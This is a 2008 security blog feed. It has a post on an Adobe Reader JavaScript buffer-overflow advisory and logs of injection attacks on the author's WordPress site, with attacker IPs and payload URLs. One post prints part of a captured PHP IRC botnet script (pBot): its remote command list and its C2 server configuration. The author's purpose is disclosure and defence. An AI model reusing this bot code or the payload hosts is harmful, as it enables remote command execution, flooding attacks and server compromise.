Kakkoi » Security http://42.kaizeku.com web development, software, windows tips and trick Sat, 12 Jul 2008 15:10:01 +0000 http://wordpress.org/?v=2.6 en Adobe Acrobat, Acrobat 3D & Reader Multiple Vulnerabilities http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/ http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/#comments Sat, 09 Feb 2008 14:35:38 +0000 Noah Ark http://blog.kakkoi.net/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/

adobe readerA JavaScript Buffer Overflow in Adobe Acrobat, Acrobat 3D & Reader allowed remote attacker to execute arbitrary code. The code will run with the privileges of the target user opening the PDF document.

Excerpt from iDefense Public Advisory;

Adobe Reader and Acrobat implement a version of JavaScript in the EScript.api plug-in which is based on the reference implementation used in Mozilla products. One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code.

Workaround

Disabled Adobe Reader & Acrobat JavaScript. Perform Update ↓

Update -Adobe Acrobat & Reader version 8.1.2

Adobe released version 8.1.2 of Adobe Reader, Acrobat & Acrobat 3D to address
these vulnerabilities.

These vulnerabilities were discovered by Greg MacManus of VeriSign iDefense Labs.

Related Posts

External Links

]]> http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/feed/ Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008 http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/ http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/#comments Wed, 06 Feb 2008 22:59:53 +0000 Noah Ark http://blog.kakkoi.net/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/

hacking attempts Today’s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts ↓. The first attacker is from 212.24.62.200 → udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort.

The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of DDNS (china → korea → us ). Noticeably the scans pattern is predictable. From our Feb 5th attack all these botnet is targeting certain search keywords security, injection so we setup a honey-pot right on that particular URL.

Hacking Attempts on Kakkoi

Sort by Injection type.

IP / DDNS UA ATT Country Params
212.24.62.200 Googlebot 1 Russia
61.152.158.46 N/A 4 China
  • http://basiclifesaving.org/mycomments/rom.txt
  • http://www.freewebtown.com/acc827/test.txt
  • Request URI: /security/injection/
  1. 85.88.3.47
  2. 74.205.123.49
  3. 210.205.6.161
  4. 207.44.246.45
 N/A 16
  1. Germany
  2. US
  3. Korea
  4. US
  • http://basiclifesaving.org/mycomments/rom.txt
  • http://www.freewebtown.com/acc827/test.txt
  • Request URI: /security/injection/

The Bot-herder Host

Part of class pBot source taken from http://basiclifesaving.org/mycomments/rom.txt

<? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ <admin@xdevil.org>
 *
 * COMMANDS:
 *
 * .user <password> //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail <to> <from> <subject> <msg> //send an email
 * .dns <IP|HOST> //dns lookup
 * .download <URL> <filename> //download a file
 * .exec <cmd> // uses exec() //execute a command
 * .sexec <cmd> // uses shell_exec() //execute a command
 * .cmd <cmd> // uses popen() //execute a command
 * .info //get system information
 * .php <php code> // uses eval() //execute php code
 * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
 * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
 * .raw <cmd> //raw IRC command
 * .rndnick //change nickname
 * .pscan <host> <port> //port scan
 * .safe // test safe_mode (dvl)
 * .inbox <to> // test inbox (dvl)
 * .conback <ip> <port> // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo "Ok unlocker. We did i!";

class pBot
{
 var $config = array("server"=>"Bucharest.ro.eu.ultra-chat.org",
 "port"=>"6667",
 "pass"=>"n",
 "prefix"=>"[R]",
 "maxrand"=>"4",
 "chan"=>"#unlocker",
 "chan2"=>"#unlocker",
 "key"=>"n",
 "modes"=>"+p",
 "password"=>"n",
 "trigger"=>".",
 "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org)
 );

Related Posts

External Links

]]> http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/feed/ Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008 http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/ http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/#comments Tue, 05 Feb 2008 12:13:27 +0000 Noah Ark http://blog.kakkoi.net/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/

hacking attempts I received lots of multiple botnet injection (e.g: code & sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful ↓.

Failed Hacking Attempts

Sort by Injection type.

IP / DDNS UA ATT Country Params
85.25.10.30 N/A 2 Germany
200.226.246.22 N/A 4 Brazil
203.151.233.24 N/A 4 Thailand
69.10.135.176 N/A 4 Canada

Related Posts

External Links

]]> http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/feed/